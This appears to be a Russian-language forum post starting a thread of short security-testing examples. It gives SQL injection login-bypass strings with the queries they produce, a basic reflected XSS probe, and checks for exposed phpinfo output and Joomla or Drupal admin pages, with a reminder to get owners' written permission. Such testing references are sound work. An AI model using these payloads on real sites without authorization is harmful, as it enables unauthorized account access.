Предлагаю в этой теме сделать огромную базу практических примеров на самые разные виды проникновения
- XSS (Cross-Site Scripting)
- XSRF / CSRF (Request Forgery)
- Code injections (SQL, PHP, ASP и т.д.)
- Server-Side Includes (SSI) Injection
- Authorization Bypass
- DoS
- и многие-многие другие
- ....
Для SQL-инъекций желательно давать примеры как самой иньекции, так и результирующего запроса (это улучшит понимание как работает инъекция). Например:
1) MySQL. Авторизация пользователя
В поле логина вводим:
any_user' or 1=1);--
В поле пароля вводим: произвольные символы
Получаем sql-запрос:
SELECT * FROM usr WHERE (login='any_user' or 1=1);-- ', password='');
Результат если есть уязвимость: вы авторизуетесь под первым пользователем, который есть в таблице
2) MySQL. Авторизация пользователя
В поле логина вводим: any_user' or (1=1 and id=3));--
any_user' or (1=1 and id=3));--
В поле пароля вводим: произвольные символы
Получаем sql-запрос:
SELECT * FROM usr WHERE (login='any_user' or (1=1 and id=3));-- ', password='');
Результат если есть уязвимость: вы авторизуетесь под пользователем, который находится в таблице под id=3
То же самое и для XSS:
3) XSS. Поиск
В поле поиска вводим:
<script>alert('XSS');</script>
Если поисковый запрос отображается на странице с результатами поиска, то при наличии уязвимости увидим поп-ап с текстом: XSS
Или такое:
4) При переходе по этой ссылке не должна отображаться инфа о настройках php на серваке
5) При переходе по этой ссылке вы не должны попасть на страницу авторизации в админку CMS joomla. Эта страница должна быть скрыта
http://yoursite.com/administrator
6) При переходе по этой ссылке вы не должны попасть на страницу авторизации в админку CMS drupal. Эта страница должна быть скрыта
С одной строны в области тестирования безопасности полно литературы, материалов, софта, а с другой - не хватает вот таких коротких примеров, которые собраны централизовано и имеют практическое применение.
- Просьба в этой теме писать только по существу, не вдаваясь в философию.
- Нумеруйте примеры. Нумерация сквозная в пределах всей темы.
- Не забывайте, примеры из этой темы нельзя использовать для внедрения на сайтах без письменного разрешения их владельцев.
- Каждому, кто внесет что-то полезное в эту тему, будем дружно добавлять репутацию.
Давайте вместе сделаем что-то полезное для всех!!!